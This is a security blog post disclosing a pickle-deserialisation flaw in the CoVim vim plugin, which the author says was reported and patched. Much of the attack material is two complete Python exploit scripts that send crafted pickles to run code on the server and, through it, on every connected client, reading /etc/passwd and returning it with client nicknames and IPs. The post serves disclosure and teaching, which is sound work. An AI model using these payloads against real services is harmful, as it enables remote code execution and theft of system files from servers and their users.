Exploiting CoVim
Introducing CoVim
CoVim is a vim plugin for collaborative editing of text documents: something like Etherpad-lite, but integrated directly into vim. Sounds cool.
The architecture is simple: one can run the Twisted server on any machine, and the vim plugin also runs Twisted code to connect to it. It is the usual client-server architecture, all in Python (you must use a version of vim compiled with Python support).
I think that CoVim has several problems that need to be solved before it reaches a mature state. In this blog post, I focus on one particular issue that I found by looking at the source code a few days after the project was announced.
Pickle fights back
The protocol is quite simple: except for the first message sent by the client to connect with its nickname, all messages are dictionaries previously serialised with pickle.
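To make the wire format concrete, here is a minimal sketch of what such a message could look like. The message contents are hypothetical (they are not taken from CoVim's source), and the snippet is written for Python 3, where the protocol 0 output differs slightly from what the Python 2 plugin produced.

```python
import json
import pickle

# Hypothetical message: the real CoVim field names may differ.
message = {'data': {'cursor': {'x': 1, 'y': 1}}}

# Protocol 0 is the text-based pickle format (the default in Python 2).
wire_pickle = pickle.dumps(message, protocol=0)

# The same dictionary serialised as JSON, for comparison.
wire_json = json.dumps(message).encode('utf-8')

print(wire_pickle)
print(wire_json)
print(len(wire_pickle), len(wire_json))
```

For this particular dictionary, the pickled form is longer than the JSON one, since every string and nested dictionary also gets a memo entry.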
Sure, this adds useless overhead to every message. But most importantly, it is a severe security flaw, one that I have already exploited in a challenge of iCTF 2013.
What does it mean? It means that an attacker can run arbitrary code on either the server or the client, depending on which party the attacker controls. And as we will see later, it is even possible to exploit all the clients connected to a server simply by connecting to that server as well.
The exploits in this article have been tested against version 2e8006f of CoVim. I reported the security flaw, and my patch was merged into the master branch at 2189404.
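As a harmless illustration of why loading a pickle amounts to running code, here is a minimal sketch (written for Python 3, not taken from CoVim). The Payload class is a made-up name; its __reduce__ method tells the unpickler to call eval on a string of our choosing.

```python
import pickle


class Payload(object):
    """Object whose pickled form asks the unpickler to call eval()."""

    def __reduce__(self):
        # (callable, args): on load, the unpickler calls eval("6 * 7").
        return (eval, ("6 * 7",))


blob = pickle.dumps(Payload())

# Loading is only acceptable here because we built the blob ourselves.
result = pickle.loads(blob)
print(result)
```

The value that comes back is whatever eval returned, not a Payload instance. Replace the arithmetic with any other expression and the loading side will evaluate it.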
Exploiting the server
The idea here is simple: as the server directly loads the data that we send, we can just craft a specific payload. That being said, we probably want to get some result back. Instead of creating a listening socket on the server, or making it connect back to us, why not use the TCP connection we already have?
Since the code uses pickle and not cPickle, it is not that simple, because self does not refer to the Protocol subclass, so we cannot directly access its transport.write method. A way around that is to import the garbage collector module and look for all instances of objects that subclass the Protocol class! This is what the string in the prototype variable is doing.
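The garbage collector trick can be tried in isolation. The sketch below is an illustration, not CoVim code: the Protocol class is a hypothetical stand-in so that the snippet runs without Twisted, and write plays the role of transport.write.

```python
import gc


class Protocol(object):
    """Hypothetical stand-in for twisted.internet.protocol.Protocol."""

    def __init__(self, name):
        self.name = name
        self.sent = []

    def write(self, data):
        # Stand-in for transport.write: just record what was "sent".
        self.sent.append(data)


class EditorProtocol(Protocol):
    """Plays the role of the server's Protocol subclass."""


# The "server" holds its connections somewhere we have no reference to.
connections = [EditorProtocol("alice"), EditorProtocol("bob")]

# Without any reference to them, ask the garbage collector for every
# tracked object and keep those that are Protocol instances.
found = [o for o in gc.get_objects() if isinstance(o, Protocol)]

for o in found:
    o.write(b"hello")

print(sorted(o.name for o in found))
```

Every live connection object is reachable this way, which is why the payload does not need self to point at the protocol instance.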
But then, if we directly send the information we are looking for (like the content of the /etc/passwd file), all legitimate clients connected to the server will crash because they will receive that payload as well, and try to unpickle it. The idea here is to create a legitimate payload (i.e. a pickled dictionary) adding the information we are looking for under an unused key, so that the regular clients will just ignore it.
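Here is a minimal sketch of that wrapping step, written for Python 3. The function names and the simplified client are assumptions made for illustration; only the dictionary shape ('data' plus an extra 'exploit' key holding hex text) follows the exploit.

```python
import pickle


def wrap_result(stolen_text):
    """Hide the text, hex-encoded, under a key that clients do not read."""
    hex_text = stolen_text.encode('utf-8').hex()
    return pickle.dumps({'data': {}, 'exploit': hex_text}, protocol=0)


def regular_client_handle(packet):
    """Simplified, hypothetical client: it only looks at the 'data' key."""
    # Unpickling is only acceptable here because we built the packet ourselves.
    message = pickle.loads(packet)
    return message['data']


packet = wrap_result("root:x:0:0:root:/root:/bin/sh")

# The regular client sees an empty update and carries on.
print(regular_client_handle(packet))

# The attacker reads the extra key and decodes it.
print(bytes.fromhex(pickle.loads(packet)['exploit']).decode('utf-8'))
```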
The rest of the exploit just sends that crafted payload to the server and listens to what is sent back. Of course, we don't want to unpickle those messages ourselves, so I just used a basic regular expression to look for strings.
import socket
import time
import re
# config: ip and port of the server
ip, port = '192.168.56.1', 12345
# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
server_exploit = prototype % (
    "__import__('pickle').dumps({'data':{},"\
    "'exploit':''.join(open('/etc/passwd').readlines()).encode('hex')})")
# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going through the messages we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print value.decode('hex')
            break
        key = value
sock.close()
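The string-scanning loop at the end of the exploit can be tested offline. The sketch below is written for Python 3. The sample is a hand-written approximation of the text a Python 2 server would send back for a small dictionary; it is an assumption, not captured traffic, and extract_exploit is a made-up helper name.

```python
import re

# Hand-written sample (an assumption) of a Python 2 protocol 0 pickle for
# {'data': {}, 'exploit': '726f6f74'}.
sample = "(dp0\nS'data'\np1\n(dp2\nsS'exploit'\np3\nS'726f6f74'\np4\ns."


def extract_exploit(stream_text):
    """Return the decoded string that follows the 'exploit' key, if any."""
    key = None
    for line in stream_text.split('\n'):
        # Each pickled string sits on its own line as S'...'.
        match = re.search(r"S'(.*)'", line)
        if match is None:
            continue
        value = match.group(1)
        if key == 'exploit':
            # The previous string was the key, so this one is its value.
            return bytes.fromhex(value).decode('ascii')
        key = value
    return None


print(extract_exploit(sample))
```

Nothing is unpickled on the attacker's side: the loop only remembers the previous string and decodes the one that follows 'exploit'.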
Exploiting all clients connected to a server
This time, we want to exploit the server in such a way that it sends a crafted payload to all the clients connected to it. Those exploited clients will then send the result of the exploit back to the server, which will forward it to the attacker (the server happily broadcasts nearly everything it receives, so nothing tricky here).
We are simply going to enclose an exploit in an exploit, like Matryoshka dolls.
We would also like to gather the nicknames of all clients as well as their IP addresses. For the IP address, the best idea is to take the one seen by the server, as it will avoid collecting local IP addresses of hosts behind a NAT.
Apart from that, since the source code of the client is really similar to that of the server, the exploit looks really similar to the previous one. There is just some encapsulation of the crafted payloads. I've limited the number of lines of /etc/passwd to be sent for the sake of the above screenshot.
import socket
import time
import re
# config: ip and port of the server
ip, port = '192.168.56.1', 12345
# exploiting pickle loads
prototype = "c__builtin__\neval\np1\n"\
    "(S'{'a':[o.transport.write(%s) for o "\
    "in __import__('gc').get_objects() if isinstance(o,"\
    "self.find_class('twisted.internet.protocol','Protocol'))],"\
    "'data':{}}'"\
    "\np1\ntp2\nRp3\n."
client_exploit = prototype % ("__import__('pickle').dumps({'data':{},"\
    "'exploit':('%s#%s#%s'%("\
    # nickname, placeholder, interesting data
    "o.fact.me,'####',''.join(open('/etc/passwd').readlines()[-8:])))."\
    "encode('hex')})")
server_exploit = prototype % ("'%s'.decode('hex').replace('####'," \
    "o.transport.getPeer().host)" \
    % client_exploit.encode('hex'))
# connects to the server
sock = socket.socket()
sock.connect((ip, port))
sock.send('attacker') # beautiful nickname
time.sleep(1) # just to be sure
sock.send(server_exploit)
sockf = sock.makefile()
# going through the messages we receive, looking for the string "exploit"
key = None
while True:
    line = sockf.readline()[:-1]
    # yes, we don't use pickle to read those messages ;-)
    s = re.search(r"S'(.*)'", line)
    if s is not None:
        value = s.groups()[0]
        if key == 'exploit':
            print '>' * 40
            print ('\n%s\n' % ('-' * 40)).join(
                value.decode('hex').split('#'))
            print '<' * 40
        key = value
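The nesting used in the exploit above can be illustrated without any network. The sketch below is written for Python 3 and uses harmless expressions; the variable names and the sample address are assumptions. The hex encoding presumably serves to keep the quotes of the inner stage from clashing with those of the outer one.

```python
# Inner stage: the expression a client would eventually evaluate.
# '####' is the placeholder that the server stage fills in.
inner_expr = "{'nickname': 'victim', 'ip': '####'}"

# Hex-encode the inner stage so its quotes cannot clash with the outer one.
inner_hex = inner_expr.encode('ascii').hex()

# Outer stage: decodes the inner stage and substitutes the placeholder.
# peer_host stands in for o.transport.getPeer().host on the real server.
outer_expr = ("bytes.fromhex('%s').decode('ascii')"
              ".replace('####', peer_host)" % inner_hex)

# Stage 1, as the server would run it (the address is a documentation example).
stage1 = eval(outer_expr, {}, {'peer_host': '203.0.113.7'})

# Stage 2, as a client would run it on what the server forwarded.
stage2 = eval(stage1, {}, {})

print(stage1)
print(stage2)
```

The server-side stage only produces text. That text becomes code again once a client evaluates it, by which point the address seen by the server has been baked in.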
Conclusion
These exploits are run against a protocol fully based on pickle, meaning that both the client and the server were vulnerable. I showed that, with some work, one can exploit all clients connected to a server just by exploiting that server.
Even if my exploits only retrieved the content of the /etc/passwd file, unsafe use of pickle does allow arbitrary code execution. Indeed, the attacker can load any module; for example, my attack used the garbage collector module in order to get all instances of a particular class. But really, the possibilities are limitless.
To conclude, let me say one more time that pickle is not to be used to load untrusted data. This is highlighted in the documentation, and was already the conclusion of a previous article of mine. However, that was probably not enough, as the author of CoVim wrote (emphasis is mine):
We actually were using json instead of pickle initially, but switched because json encoded strings to unicode, while pickle didn't. I didn't know there were security issues involved, i'll look into changing it back.
This means that mentioning it in the documentation is not enough. What can be done to enforce a proper use of pickle? Do not automatically load what was supposed to be defined by a __reduce__ method? Rename the load and loads methods to something more verbose, like load_but_insecure_if_not_trusted_input? This is an open question whose answer is very likely to break compatibility. Which means that we will continue to find this vulnerability inside new programs in the foreseeable future.
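On the first suggestion, the pickle documentation already describes an opt-in way to restrict which globals an unpickler may resolve, by overriding find_class. Here is a minimal sketch for Python 3. The class and function names are made up, and this is not the patch that was merged into CoVim.

```python
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global (class or function)."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))


def restricted_loads(data):
    """Like pickle.loads, but only plain containers and scalars can load."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


class Payload(object):
    def __reduce__(self):
        # Asks the unpickler to call eval("6 * 7") on load.
        return (eval, ("6 * 7",))


# A plain dictionary still loads fine.
plain = restricted_loads(pickle.dumps({'data': {}}))

# A payload that needs eval is rejected before anything is called.
try:
    restricted_loads(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(plain, blocked)
```

This shows the compatibility cost mentioned above: anything that relies on looking up a class or a function can no longer be loaded, and the restriction has to be opted into by each program.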